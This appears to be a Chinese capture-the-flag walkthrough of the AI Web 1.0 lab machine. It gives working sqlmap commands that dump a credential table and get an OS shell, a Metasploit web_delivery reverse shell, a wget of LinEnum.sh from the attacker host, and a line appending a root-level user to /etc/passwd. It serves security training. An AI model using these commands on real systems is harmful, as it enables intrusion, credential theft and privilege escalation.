zoukankan      html  css  js  c++  java
  • AI Web 1.0

    kali:192.168.0.103

    目标机:192.168.0.105

    0X01 端口和目录扫描

    打开目标主页没有任何信息

    clipboard

    a) 端口扫描

    只有一个80端口开启

    clipboard

    b) 目录扫描

    clipboard

    0x03 查看敏感目录robots

    clipboard

    访问敏感目录地址

    两个目录都没有权限访问

    尝试继续挖掘

    在http://192.168.0.105/m3diNf0下发现info.php文件记录这各种php信息

    clipboard

    http://192.168.0.105/se3reTdir777/uploads/没有挖到任何目录,此时回过头来看看上一级目录是什么

    clipboard

    是一个查看信息输入框。

    结合现在所得到的信息,能想到的只有输入框是否有sql注入


    0X04 SQL注入

    clipboard

    a) 验证漏洞是否存在

    将1'带入输入框后报错,说明将1'数据带入到数据库了,是有注入点的

    b) sqlmap跑数据库

    抓包生成re.txt文件

    clipboard

    运行sqlmap

    sqlmap -r /root/re.txt --dbs --batch

    clipboard

    最终得到的数据库账号密码

    sqlmap -r /root/re.txt -D aiweb1 -T systemUser -C userName,password --batch

    clipboard

    由此我们得到了凭证


    0X05 sqlmap get webshell

    sqlmap -r /root/re.txt --os-shell

    clipboard

    clipboard

    这里选用自定义地址,必须是目标网站的真是物理地址,结合之前得到的phpinfo信息

    clipboard

    网站根路径/home/www/html/web1x443290o2sdf92213

    clipboard

    出现错误,可能是没有写入权限,试了试已知的几个路径发现/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/可以写入成功

    clipboard


    0X06 系统提权

    a) 反弹交互式shell

    使用命令执行的方式获取反弹shell

    use exploit/multi/script/web_delivery

    clipboard

    b) 获取系统及文件信息 (使用脚本LinEnum.sh,kali开启web服务)

    cd /tmp wget "http://192.168.0.103/LinEnum.sh" chmod +x LinEnum.sh ./LinEnum.sh -e /tmp

    执行完上述命令后查看生成的报告,查看文件夹,以外的发现/etc/passwd对当前用户来说是可读可写可执行

    c) 编辑passwd文件 添加root权限用户

    perl -le 'print crypt("password@123","addedsalt")' echo "test:生成的密码:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd

    切换用户 su test

    密码 password@123

  • 相关阅读:
    OC-数组类
    OC-字符串函数
    C——位操作
    C——字符串练习
    C语言——指针习题
    指针数组和数组指针
    数组指针和指针数组的区别
    cocos2d-iphone中兼容iphone/ipad的问题
    一个Universal程序还是iPhone、iPad俩个版本 ?
    objective-c获取自1970年以来的毫秒数
  • 原文地址:https://www.cnblogs.com/sup3rman/p/12310328.html
Copyright © 2011-2022 走看看